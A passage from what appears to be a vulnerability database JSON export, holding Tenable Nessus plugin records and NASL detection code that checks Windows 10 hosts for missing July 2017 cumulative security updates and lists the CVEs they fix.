vulnerability exists in Win32k\n due to improper handling of objects in memory. A local\n attacker can exploit this, via a specially crafted\n application, to disclose sensitive information.\n (CVE-2017-8486)\n\n - A security bypass vulnerability exists in Microsoft\n Windows when handling Kerberos ticket exchanges due to a\n failure to prevent tampering with the SNAME field. A\n man-in-the-middle attacker can exploit this to bypass\n the Extended Protection for Authentication security\n feature. (CVE-2017-8495)\n\n - An information disclosure vulnerability exists in the\n Windows System Information Console due to improper\n parsing of XML input that contains a reference to an\n external entity. An unauthenticated, remote attacker\n can exploit this, by convincing a user to open a\n specially crafted file, to disclose arbitrary files via\n an XML external entity (XXE) declaration.\n (CVE-2017-8557)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. (CVE-2017-8561)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper handling of calls to Advanced\n Local Procedure Call (ALPC). An authenticated, remote\n attacker can exploit this via a specially crafted\n application, to run processes in an elevated context.\n (CVE-2017-8562)\n\n - An elevation of privilege vulnerability exists in\n Windows due to Kerberos falling back to NT LAN Manager\n (NTLM) Authentication Protocol as the default\n authentication protocol. An authenticated, remote\n attacker can exploit this, via an application that\n sends specially crafted traffic to a domain controller,\n to run processes in an elevated context. (CVE-2017-8563)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. An authenticated, remote attacker can exploit\n this, via a specially crafted application, to bypass\n Kernel Address Space Layout Randomization (KASLR) and\n disclose the base address of the kernel driver.\n (CVE-2017-8564)\n\n - A remote code execution vulnerability exists in\n PowerShell when handling a PSObject that wraps a CIM\n instance. An authenticated, remote attacker can exploit\n this, via a specially crafted script, to execute\n arbitrary code in a PowerShell remote session.\n (CVE-2017-8565)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper handling of objects in memory. A\n local attacker can exploit this, via a specially crafted\n application, to run arbitrary code in kernel mode.\n (CVE-2017-8581)\n\n - An information disclosure vulnerability exists in the\n HTTP.sys server application component due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted request, to disclose sensitive information.\n (CVE-2017-8582)\n\n - A denial of service vulnerability exists in the\n Microsoft Common Runtime Library component due to\n improper handling of web requests. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted request, to cause a denial of service condition\n in a .NET application. (CVE-2017-8585)\n\n - A denial of service vulnerability exists in Windows\n Explorer that is triggered when Explorer attempts to\n open a non-existent file. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to cause a user's system to\n stop responding. (CVE-2017-8587)\n\n - A remote code execution vulnerability exists in WordPad\n due to improper parsing of specially crafted files. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted file, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-8588)\n\n - A remote code execution vulnerability exists in the\n Windows Search component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by sending specially crafted messages\n to the Windows Search service, to elevate privileges and\n execute arbitrary code. (CVE-2017-8589)\n\n - An elevation of privilege vulnerability exists in the\n Windows Common Log File System (CLFS) driver due to\n improper handling of objects in memory. A local attacker\n can exploit this, via a specially crafted application,\n to run processes in an elevated context. (CVE-2017-8590)\n\n - A security bypass vulnerability exists in Microsoft\n browsers due to improper handling of redirect requests.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to bypass CORS redirect restrictions. (CVE-2017-8592)\n\n - Multiple remote code execution vulnerability exist in\n Microsoft Edge in the scripting engine due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit these, by convincing a user\n to visit a specially crafted website, to execute\n arbitrary code in the context of the current user.\n (CVE-2017-8595, CVE-2017-8598, CVE-2017-8603,\n CVE-2017-8604, CVE-2017-8605, CVE-2017-8619)\n\n - A security bypass vulnerability exists in Microsoft Edge\n due to a failure to correctly apply the same-origin\n policy for HTML elements present in other browser\n windows. An unauthenticated, remote attacker can exploit\n this, by convincing a user to follow a link, to cause\n the user to load a malicious website. (CVE-2017-8599)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8601)\n\n - A spoofing vulnerability exists in Microsoft browsers\n due to improper parsing of HTTP content. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to click a specially crafted URL, to\n redirect the user to a malicious website.\n (CVE-2017-8602)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit these, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8606, CVE-2017-8607, CVE-2017-8608)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the scripting engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8609)\n\n - A spoofing vulnerability exists in Microsoft Edge due to\n improper parsing of HTTP content. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to click a specially crafted URL, to redirect the user\n to a malicious website. (CVE-2017-8611)\n\n - A remote code execution vulnerability exists in Internet\n Explorer in the VBScript engine due to improper handling\n of objects in memory. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to execute arbitrary code\n in the context of the current user. (CVE-2017-8618)", "edition": 29, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-07-11T00:00:00", "title": "KB4025344: Windows 10 Version 1511 July 2017 Cumulative Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0170", "CVE-2017-8578", "CVE-2017-8608", "CVE-2017-8486", "CVE-2017-8588", "CVE-2017-8580", "CVE-2017-8573", "CVE-2017-8599", "CVE-2017-8587", "CVE-2017-8564", "CVE-2017-8556", "CVE-2017-8606", "CVE-2017-8619", "CVE-2017-8598", "CVE-2017-8607", "CVE-2017-8604", "CVE-2017-8601", "CVE-2017-8565", "CVE-2017-8603", "CVE-2017-8605", "CVE-2017-8561", "CVE-2017-8467", "CVE-2017-8585", "CVE-2017-8562", "CVE-2017-8495", "CVE-2017-8609", "CVE-2017-8563", "CVE-2017-8589", "CVE-2017-8592", "CVE-2017-8557", "CVE-2017-8581", "CVE-2017-8595", "CVE-2017-8611", "CVE-2017-8577", "CVE-2017-8582", "CVE-2017-8602", "CVE-2017-8618", "CVE-2017-8463", "CVE-2017-8590"], "modified": "2017-07-11T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS17_JUL_4025344.NASL", "href": "https://www.tenable.com/plugins/nessus/101369", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101369);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/18\");\n\n script_cve_id(\n \"CVE-2017-0170\",\n \"CVE-2017-8463\",\n \"CVE-2017-8467\",\n \"CVE-2017-8486\",\n \"CVE-2017-8495\",\n \"CVE-2017-8556\",\n \"CVE-2017-8557\",\n \"CVE-2017-8561\",\n \"CVE-2017-8562\",\n \"CVE-2017-8563\",\n \"CVE-2017-8564\",\n \"CVE-2017-8565\",\n \"CVE-2017-8573\",\n \"CVE-2017-8577\",\n \"CVE-2017-8578\",\n \"CVE-2017-8580\",\n \"CVE-2017-8581\",\n \"CVE-2017-8582\",\n \"CVE-2017-8585\",\n \"CVE-2017-8587\",\n \"CVE-2017-8588\",\n \"CVE-2017-8589\",\n \"CVE-2017-8590\",\n \"CVE-2017-8592\",\n \"CVE-2017-8595\",\n \"CVE-2017-8598\",\n \"CVE-2017-8599\",\n \"CVE-2017-8601\",\n \"CVE-2017-8602\",\n \"CVE-2017-8603\",\n \"CVE-2017-8604\",\n \"CVE-2017-8605\",\n \"CVE-2017-8606\",\n \"CVE-2017-8607\",\n \"CVE-2017-8608\",\n \"CVE-2017-8609\",\n \"CVE-2017-8611\",\n \"CVE-2017-8618\",\n \"CVE-2017-8619\"\n );\n script_bugtraq_id(\n 99439,\n 99432,\n 99431,\n 99429,\n 99428,\n 99427,\n 99426,\n 99425,\n 99424,\n 99423,\n 99421,\n 99420,\n 99419,\n 99418,\n 99417,\n 99416,\n 99414,\n 99413,\n 99412,\n 99410,\n 99409,\n 99408,\n 99407,\n 99406,\n 99403,\n 99402,\n 99400,\n 99399,\n 99398,\n 99397,\n 99396,\n 99394,\n 99393,\n 99392,\n 99391,\n 99390,\n 99389,\n 99388,\n 99387\n );\n script_xref(name:\"MSKB\", value:\"4025344\");\n script_xref(name:\"MSFT\", value:\"MS17-4025344\");\n\n script_name(english:\"KB4025344: Windows 10 Version 1511 July 2017 Cumulative Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows 10 version 1511 host is missing security update\nKB4025344. It is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists in the\n Windows Performance Monitor Console due to improper\n parsing of XML input that contains a reference to an\n external entity. An unauthenticated, remote attacker\n can exploit this, by convincing a user to create a\n Data Collector Set and import a specially crafted XML\n file, to disclose arbitrary files via an XML external\n entity (XXE) declaration. (CVE-2017-0170)\n\n - A remote code execution vulnerability exists in Windows\n Explorer due to improper handling of executable files\n and shares during rename operations. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to open a specially crafted file, to execute arbitrary\n code in the context of the current user. (CVE-2017-8463)\n\n - Multiple elevation of privilege vulnerabilities exist in\n the Microsoft Graphics component due to improper\n handling of objects in memory. A local attacker can\n exploit these, via a specially crafted application, to\n run arbitrary code in kernel mode. (CVE-2017-8467,\n CVE-2017-8556, CVE-2017-8573, CVE-2017-8577,\n CVE-2017-8578, CVE-2017-8580)\n\n - An information disclosure vulnerability exists in Win32k\n due to improper handling of objects in memory. A local\n attacker can exploit this, via a specially crafted\n application, to disclose sensitive information.\n (CVE-2017-8486)\n\n - A security bypass vulnerability exists in Microsoft\n Windows when handling Kerberos ticket exchanges due to a\n failure to prevent tampering with the SNAME field. A\n man-in-the-middle attacker can exploit this to bypass\n the Extended Protection for Authentication security\n feature. (CVE-2017-8495)\n\n - An information disclosure vulnerability exists in the\n Windows System Information Console due to improper\n parsing of XML input that contains a reference to an\n external entity. An unauthenticated, remote attacker\n can exploit this, by convincing a user to open a\n specially crafted file, to disclose arbitrary files via\n an XML external entity (XXE) declaration.\n (CVE-2017-8557)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. (CVE-2017-8561)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper handling of calls to Advanced\n Local Procedure Call (ALPC). An authenticated, remote\n attacker can exploit this via a specially crafted\n application, to run processes in an elevated context.\n (CVE-2017-8562)\n\n - An elevation of privilege vulnerability exists in\n Windows due to Kerberos falling back to NT LAN Manager\n (NTLM) Authentication Protocol as the default\n authentication protocol. An authenticated, remote\n attacker can exploit this, via an application that\n sends specially crafted traffic to a domain controller,\n to run processes in an elevated context. (CVE-2017-8563)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. An authenticated, remote attacker can exploit\n this, via a specially crafted application, to bypass\n Kernel Address Space Layout Randomization (KASLR) and\n disclose the base address of the kernel driver.\n (CVE-2017-8564)\n\n - A remote code execution vulnerability exists in\n PowerShell when handling a PSObject that wraps a CIM\n instance. An authenticated, remote attacker can exploit\n this, via a specially crafted script, to execute\n arbitrary code in a PowerShell remote session.\n (CVE-2017-8565)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper handling of objects in memory. A\n local attacker can exploit this, via a specially crafted\n application, to run arbitrary code in kernel mode.\n (CVE-2017-8581)\n\n - An information disclosure vulnerability exists in the\n HTTP.sys server application component due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted request, to disclose sensitive information.\n (CVE-2017-8582)\n\n - A denial of service vulnerability exists in the\n Microsoft Common Runtime Library component due to\n improper handling of web requests. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted request, to cause a denial of service condition\n in a .NET application. (CVE-2017-8585)\n\n - A denial of service vulnerability exists in Windows\n Explorer that is triggered when Explorer attempts to\n open a non-existent file. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to cause a user's system to\n stop responding. (CVE-2017-8587)\n\n - A remote code execution vulnerability exists in WordPad\n due to improper parsing of specially crafted files. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted file, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-8588)\n\n - A remote code execution vulnerability exists in the\n Windows Search component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by sending specially crafted messages\n to the Windows Search service, to elevate privileges and\n execute arbitrary code. (CVE-2017-8589)\n\n - An elevation of privilege vulnerability exists in the\n Windows Common Log File System (CLFS) driver due to\n improper handling of objects in memory. A local attacker\n can exploit this, via a specially crafted application,\n to run processes in an elevated context. (CVE-2017-8590)\n\n - A security bypass vulnerability exists in Microsoft\n browsers due to improper handling of redirect requests.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to bypass CORS redirect restrictions. (CVE-2017-8592)\n\n - Multiple remote code execution vulnerability exist in\n Microsoft Edge in the scripting engine due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit these, by convincing a user\n to visit a specially crafted website, to execute\n arbitrary code in the context of the current user.\n (CVE-2017-8595, CVE-2017-8598, CVE-2017-8603,\n CVE-2017-8604, CVE-2017-8605, CVE-2017-8619)\n\n - A security bypass vulnerability exists in Microsoft Edge\n due to a failure to correctly apply the same-origin\n policy for HTML elements present in other browser\n windows. An unauthenticated, remote attacker can exploit\n this, by convincing a user to follow a link, to cause\n the user to load a malicious website. (CVE-2017-8599)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8601)\n\n - A spoofing vulnerability exists in Microsoft browsers\n due to improper parsing of HTTP content. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to click a specially crafted URL, to\n redirect the user to a malicious website.\n (CVE-2017-8602)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit these, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8606, CVE-2017-8607, CVE-2017-8608)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the scripting engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8609)\n\n - A spoofing vulnerability exists in Microsoft Edge due to\n improper parsing of HTTP content. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to click a specially crafted URL, to redirect the user\n to a malicious website. (CVE-2017-8611)\n\n - A remote code execution vulnerability exists in Internet\n Explorer in the VBScript engine due to improper handling\n of objects in memory. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to execute arbitrary code\n in the context of the current user. (CVE-2017-8618)\");\n # https://support.microsoft.com/en-us/help/4025344/windows-10-update-kb4025344\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e69fa96a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4025344.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS17-07';\nkb = make_list(\n '4025344' # 10 1151\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kb, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"2016\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(exit_on_fail:TRUE, as_share:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # 10 (1511)\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10586\",\n rollup_date: \"07_2017\",\n bulletin:bulletin,\n rollup_kb_list:make_list(4025344))\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T18:30:53", "description": "The remote Windows host is missing security update 4025338.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Windows Search handles objects in memory. An attacker\n who successfully exploited this vulnerability could take\n control of the affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2017-8589)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine, when rendered in Internet\n Explorer, handles objects in memory. In a web-based\n attack scenario, an attacker could host a specially\n crafted website that is designed to exploit this\n vulnerability through Internet Explorer and then\n convince a user to view the website. An attacker could\n also embed an ActiveX control marked "safe for\n initialization in an application or Microsoft\n Office document that hosts the Internet Explorer\n rendering engine. The attacker could also take advantage\n of compromised websites and websites that accept or host\n user-provided content or advertisements. These websites\n could contain specially crafted content that could\n exploit this vulnerability. An attacker who successfully\n exploited this vulnerability could gain the same user\n rights as the current user. (CVE-2017-8618)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2017-8467, CVE-2017-8556,\n CVE-2017-8573, CVE-2017-8577, CVE-2017-8578,\n CVE-2017-8580)\n\n - A Denial Of Service vulnerability exists when Windows\n Explorer attempts to open a non-existent file. An\n attacker who successfully exploited this vulnerability\n could cause a denial of service. A attacker could\n exploit this vulnerability by hosting a specially\n crafted web site and convince a user to browse to the\n page, containing the reference to the non-existing file,\n and cause the victim's system to stop responding. An\n attacker could not force a user to view the attacker-\n controlled content. Instead, an attacker would have to\n convince a user to take action. For example, an attacker\n could trick a user into clicking a link that takes the\n user to the attacker's site The update addresses the\n vulnerability by correcting how Windows Explorer handles\n open attempts for non-existent files. (CVE-2017-8587)\n\n - A remote code execution vulnerability exists in the way\n JavaScript engines render when handling objects in\n memory in Microsoft browsers. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2017-8606, CVE-2017-8607,\n CVE-2017-8608)\n\n - A security feature bypass vulnerability exists in\n Microsoft Windows when Kerberos fails to prevent\n tampering with the SNAME field during ticket exchange.\n An attacker who successfully exploited this\n vulnerability could use it to bypass Extended Protection\n for Authentication. (CVE-2017-8495)\n\n - A remote code execution vulnerability exists in the way\n that the Scripting Engine renders when handling objects\n in memory in Microsoft browsers. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-8609)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2017-8561)\n\n - A remote code execution vulnerability exists in\n PowerShell when PSObject wraps a CIM Instance. An\n attacker who successfully exploited this vulnerability\n could execute malicious code on a vulnerable system. In\n an attack scenario, an attacker could execute malicious\n code in a PowerShell remote session. The update\n addresses the vulnerability by correcting how PowerShell\n deserializes user supplied scripts. (CVE-2017-8565)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles calls to Advanced Local\n Procedure Call (ALPC). An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n the security context of the local system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-8562)\n\n - An information disclosure vulnerability exists in\n Microsoft Windows when Win32k fails to properly handle\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-8486)\n\n - An information disclosure vulnerability exists in the\n Windows Performance Monitor Console when it improperly\n parses XML input containing a reference to an external\n entity. An attacker who successfully exploited this\n vulnerability could read arbitrary files via an XML\n external entity (XXE) declaration. (CVE-2017-0170)\n\n - A remote code execution vulnerability exists in the way\n Microsoft Edge handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2017-8595, CVE-2017-8605,\n CVE-2017-8619)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. (CVE-2017-8590)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address, allowing an attacker to retrieve information\n that could lead to a Kernel Address Space Layout\n Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the base address of the kernel driver from a compromised\n process. (CVE-2017-8564)\n\n - A security feature bypass vulnerability exists when\n Microsoft Browsers improperly handle redirect requests.\n This vulnerability allows Microsoft Browsers to bypass\n CORS redirect restrictions and to follow redirect\n requests that should otherwise be ignored. An attacker\n who successfully exploited this vulnerability could\n force the browser to send data that would otherwise be\n restricted to a destination web site of their choice.\n (CVE-2017-8592)\n\n - An Information Disclosure vulnerability exists when the\n HTTP.sys server application component improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the HTTP.sys server application\n system. A remote unauthenticated attacker could exploit\n this vulnerability by issuing a request to the HTTP.sys\n server application. The update addresses the\n vulnerability by correcting how the HTTP.sys server\n application handles objects in memory. (CVE-2017-8582)\n\n - A spoofing vulnerability exists when an affected\n Microsoft browser does not properly parse HTTP content.\n An attacker who successfully exploited this\n vulnerability could trick a user by redirecting the user\n to a specially crafted website. The specially crafted\n website could either spoof content or serve as a pivot\n to chain an attack with other vulnerabilities in web\n services. (CVE-2017-8602)\n\n - A denial of service vulnerability exists when Microsoft\n Common Object Runtime Library improperly handles web\n requests. An attacker who successfully exploited this\n vulnerability could cause a denial of service against a\n .NET web application. A remote unauthenticated attacker\n could exploit this vulnerability by issuing specially\n crafted requests to the .NET application. The update\n addresses the vulnerability by correcting how the .NET\n web application handles web requests. (CVE-2017-8585)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run processes in an elevated context.\n (CVE-2017-8581)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when a man-in-the-middle attacker is\n able to successfully forward an authentication request\n to a Windows LDAP server, such as a system running\n Active Directory Domain Services (AD DS) or Active\n Directory Lightweight Directory Services (AD LDS), which\n has been configured to require signing or sealing on\n incoming connections. The update addresses this\n vulnerability by incorporating support for Extended\n Protection for Authentication security feature, which\n allows the LDAP server to detect and block such\n forwarded authentication requests once enabled.\n (CVE-2017-8563)\n\n - A spoofing vulnerability exists when Microsoft Edge\n improperly handles specific HTML content. An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was on a\n legitimate website. The specially crafted website could\n either spoof content or serve as a pivot to chain an\n attack with other vulnerabilities in web services.\n (CVE-2017-8611)\n\n - A security feature bypass vulnerability exists when\n Microsoft Edge fails to correctly apply Same Origin\n Policy for HTML elements present in other browser\n windows. An attacker could use this vulnerability to\n trick a user into loading a page with malicious content.\n (CVE-2017-8599)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft WordPad parses specially crafted files.\n Exploitation of this vulnerability requires that a user\n open a specially crafted file with an affected version\n of Microsoft WordPad. (CVE-2017-8588)\n\n - A remote code execution vulnerability exists when\n Windows Explorer improperly handles executable files and\n shares during rename operations. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in the context of another user. Users not\n running as administrators would be less affected.\n (CVE-2017-8463)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. In a web-based attack scenario, an attacker could\n host a specially crafted website that is designed to\n exploit the vulnerability through Microsoft browsers and\n then convince a user to view the website. An attacker\n could also embed an ActiveX control marked "safe\n for initialization" in an application or Microsoft\n Office document that hosts the related rendering engine.\n The attacker could also take advantage of compromised\n websites, and websites that accept or host user-provided\n content or advertisements. These websites could contain\n specially crafted content that could exploit the\n vulnerability. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2017-8601)\n\n - An information disclosure vulnerability exists in the\n Windows System Information Console when it improperly\n parses XML input containing a reference to an external\n entity. An attacker who successfully exploited this\n vulnerability could read arbitrary files via an XML\n external entity (XXE) declaration. (CVE-2017-8557)", "edition": 24, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-11-03T00:00:00", "title": "KB4025338: Windows 10 July 2017 Cumulative Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0170", "CVE-2017-8578", "CVE-2017-8608", "CVE-2017-8486", "CVE-2017-8588", "CVE-2017-8580", "CVE-2017-8573", "CVE-2017-8599", "CVE-2017-8587", "CVE-2017-8564", "CVE-2017-8556", "CVE-2017-8606", "CVE-2017-8619", "CVE-2017-8607", "CVE-2017-8601", "CVE-2017-8565", "CVE-2017-8605", "CVE-2017-8561", "CVE-2017-8467", "CVE-2017-8585", "CVE-2017-8562", "CVE-2017-8495", "CVE-2017-8609", "CVE-2017-8563", "CVE-2017-8589", "CVE-2017-8592", "CVE-2017-8557", "CVE-2017-8581", "CVE-2017-8595", "CVE-2017-8611", "CVE-2017-8577", "CVE-2017-8582", "CVE-2017-8602", "CVE-2017-8618", "CVE-2017-8463", "CVE-2017-8590"], "modified": "2017-11-03T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS17_JUL_4025338.NASL", "href": "https://www.tenable.com/plugins/nessus/104383", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104383);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/18\");\n\n script_cve_id(\n \"CVE-2017-0170\",\n \"CVE-2017-8463\",\n \"CVE-2017-8467\",\n \"CVE-2017-8486\",\n \"CVE-2017-8495\",\n \"CVE-2017-8556\",\n \"CVE-2017-8557\",\n \"CVE-2017-8561\",\n \"CVE-2017-8562\",\n \"CVE-2017-8563\",\n \"CVE-2017-8564\",\n \"CVE-2017-8565\",\n \"CVE-2017-8573\",\n \"CVE-2017-8577\",\n \"CVE-2017-8578\",\n \"CVE-2017-8580\",\n \"CVE-2017-8581\",\n \"CVE-2017-8582\",\n \"CVE-2017-8585\",\n \"CVE-2017-8587\",\n \"CVE-2017-8588\",\n \"CVE-2017-8589\",\n \"CVE-2017-8590\",\n 